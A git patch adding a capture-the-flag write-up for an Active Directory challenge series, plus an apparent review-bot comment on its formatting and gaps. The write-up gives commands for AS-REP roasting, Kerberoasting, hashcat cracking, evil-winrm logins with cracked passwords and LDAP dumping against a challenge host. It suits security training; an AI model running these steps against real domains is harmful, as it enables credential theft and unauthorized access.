From 600c12162b0386f477920e4e4005f2b62dfb22d4 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 9 Sep 2022 17:47:43 +0500
Subject: [PATCH] Create AD Category.md
---
Winja CTF 2022/AD Category.md | 119 ++++++++++++++++++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 Winja CTF 2022/AD Category.md
diff --git a/Winja CTF 2022/AD Category.md b/Winja CTF 2022/AD Category.md
new file mode 100644
index 0000000..95d8ce0
--- /dev/null
+++ b/Winja CTF 2022/AD Category.md
@@ -0,0 +1,119 @@
+# Blemflarck
+
+This challenge is related to Active Directory in which we are given these files, `admins.txt` , `hosts` and `nmap.txt`
+
+
+
+admins.txt contains a list of usernames
+
+
+
+nmap.txt contains result of nmap of the domain controller
+
+
+
+and `hosts` contains the IP and domain name of the target
+
+
+
+Now to start solving this, we have a list of usernames of the domain, need to verfiy which users are valid on the domain for that we can use `kerbrute`
+
+
+We can try performing AS-REP roasting using `GetNPUsers` from `impacket` in which the user `shreya` doesn't have pre-authentication set so without providing a valid password for the user we can request for his TGT
+
+```bash
+GetNPUsers.py vindicators.space/ -usersfile ./admins.txt -request
+```
+
+
+
+To crack this we can use `hashcat` with mode `18200
+
+```bash
+hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt --force
+```
+
+
+
+This will crack the hash with password `$anturce77RioGr@ndePR`
+
+
+Now having the credentials we can login through WinRM which is running on port 5985 using `evil-winrm`
+
+```bash
+evil-winrm -i 34.218.188.252 -u 'shreya' -p ''
+```
+After logging in we can get the flag for this challenge
+
+
+
+## PhoenixPerson
+
+
+
+This challenge is continuation from the first one, we have a valid set of credential, we can try using kerberoasting, if there's a SPN tied to an account we can request for TGS and later crack it
+
+```bash
+GetUserSPNs.py vindicators.space/shreya -request
+```
+
+
+Runing hashcat to crack this hash
+
+
+
+
+
+Now logging with mirage user
+
+```bash
+evil-winrm -i 34.218.188.252 -u 'mirage' -p '!@#New_Life87!@#'
+```
+
+
+
+## DAB-389 b
+
+
+
+This challenge is the last part of AD category where we need to find the third flag through the user `mirage`
+
+From the description the number 389 is referrenced as LDAP which is the port number for that service, we need to enumerate LDAP, there's a tool called `ldapdomaindump`
+
+```bash
+ldapdomaindump -u 'mirage' -p '!@#New_Life87!@#' ldap://34.218.188.252
+```
+
+
+This will generate some html files for users, groups and computers in the domain, going through the `domain_users.html` file we'll get the first part of the flag
+
+
+
+
+
+The second part will be found from `domain_computers.html`
+
+
+
+And the third one from `domain_groups.html`
+
+
+
+We can get the flag through `grep` as well by using regular expression
+
+
+
+Which makes the final flag
+
+```
+flag{3fe05494a09ac38bb5199698b475c48c_LD4P_3num3r4t10n_FTW_:)}
+
+```
+There were good challenges and a lot of categories including web3, cloud and source code review which I haven't done before, due to me doing "real world assesments" I wasn't able to touch the rest of the challenges
+
+
+
+## References
+ - https://hashcat.net/wiki/doku.php?id=example_hashes
+ - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
+ - https://www.cyberciti.biz/faq/grep-regular-expressions/
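Review bot: The `evil-winrm` command in the Blemflarck section (`evil-winrm -i 34.218.188.252 -u 'shreya' -p ''`) passes an empty password, which contradicts the line just above it stating the hash cracked to `$anturce77RioGr@ndePR`; either use that value in the `-p` argument (single-quoted, since it contains `$` and `@`) or explain why an empty password works here. Several steps are described but their commands are missing: the `kerbrute` user enumeration in Blemflarck, the `hashcat` run for the Kerberoast hash in PhoenixPerson ("Runing hashcat to crack this hash" has no command or mode, unlike the AS-REP section which shows `-m 18200`), and the `grep` regular expression in DAB-389; the blank stretches after these lines suggest screenshots that did not make it into the markdown, so the commands should be written out in fenced blocks. Minor fixes: the inline code on "mode `18200" is missing its closing backtick; the heading "DAB-389 b" has a stray " b"; the first challenge uses `#` while the other two use `##`; the final flag block has no language tag and an extra blank line before the closing fence; and "verfiy", "Runing", "referrenced" and "assesments" are typos.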